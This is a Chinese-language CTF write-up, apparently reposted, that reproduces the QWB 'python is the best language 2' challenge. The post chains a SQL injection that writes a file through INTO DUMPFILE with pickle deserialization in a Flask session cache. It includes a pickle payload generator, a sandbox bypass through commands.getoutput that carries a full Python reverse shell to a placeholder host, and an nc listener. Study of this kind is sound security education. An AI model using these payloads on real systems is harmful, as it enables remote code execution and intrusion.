當(dāng)前位置：首頁 > 编程语言 > python >内容正文

python

复现强网杯python is the best language 2

發(fā)布時(shí)間：2024/4/13 python 47 豆豆

生活随笔收集整理的這篇文章主要介紹了复现强网杯python is the best language 2 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

參考文獻(xiàn)：https://xz.aliyun.com/t/2219
http://120.77.209.122/index.php/archives/25/

源碼下載下來后，是基于flask框架，先查看路由文件routes.py，里面功能大部分是基于登陸的。

在others.py的最后有這樣的內(nèi)容

2.png

load()函數(shù)有一個(gè)unpkler函數(shù)用于反序列化參數(shù)(file)，如果file可控那么這就是一個(gè)反序列化漏洞。

借用下大佬的payload，理解下這個(gè)。

用下面的腳本(12.py)進(jìn)行序列化payload的生成：

import os from pickle import Pickler as Pkler import commands class hhh(object):def __reduce__(self):return (os.system,("whoami",)) evil = hhh()def dump(file):pkler = Pkler(file)pkler.dump(evil)with open("test","wb") as f:dump(f)

測試反序列化漏洞(13.py):

from pickle import Unpickler as Unpkler from io import open as Open def LOAD(file):unpkler = Unpkler(file)return Unpkler(file).load()with Open("test","rb") as f:LOAD(f)

執(zhí)行會(huì)12.py后，會(huì)在12.py的同級目錄下生成test，執(zhí)行13.py會(huì)顯示出用戶信息

全局搜索load()函數(shù)，發(fā)現(xiàn)它在Mycache.py的FileSystemCache類中有多次引用。（代碼太長了，貼下有用的）

2.png
跟入_get_filename方法
2.png
可以看到將傳入的字符串key進(jìn)行MD5，并將其返回。通過全局搜索，發(fā)現(xiàn)在Mysession.py的open_session中調(diào)用了key
2.png
1.png

其中self.key_prefix為bdwsessions，因此假設(shè)cookie中的sesssion值為pleated，則self.key_prefix + sid即為bdwsessionspleated，然后這串字符串進(jìn)行MD5得到的結(jié)果0ab5423aafb316e9c299e0bb853d0c11。這樣就可以控制file了。

攻擊流程
①本地生成序列化文件，并且進(jìn)行十六進(jìn)制編碼
②通過第一關(guān)的sql注入，將本地生成的payload,寫入服務(wù)器上的session文件，指定文件名為MD5(bdwsessionspleated),這樣我們在訪問/index的時(shí)候把cookie中的session值改為pleated，觸發(fā)open_session中的self.cache.get就可以進(jìn)行反序列化攻擊了

沙箱逃逸
源碼還設(shè)置了沙箱/黑名單來防止某些函數(shù)的執(zhí)行，比如前面的os.system就被禁用了

2.png
此處過濾了大多數(shù)函數(shù)，但是commands.getoutput和subprocess.Popen()并沒有過濾,payload用的是commands.getoutput

import cPickle import commandsclass Exp(object):def __reduce__(self):return (commands.getoutput,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",)) e = Exp() poc = cPickle.dumps(e) print '0x'+poc.encode('hex')

在注冊的郵箱處填入：

test12'/**/union/**/select/**/0x63636f....../**/into/**/dumpfile/**/'/tmp/ffff/0ab5423aafb316e9c299e0bb853d0c11'#@test12.com

注冊后出現(xiàn)Please use a different email address.。說明寫入成功
然后訪問http://39.107.32.29/:20000/index
抓包修改session值為pleated

反彈shell

nc -l -p 8181 -vvv

查看flag即可。

總結(jié)

以上是生活随笔為你收集整理的复现强网杯python is the best language 2的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇：沃尔玛建立自家的人工智能网络，抗衡竞争对
下一篇：使用python实现人脸检测转载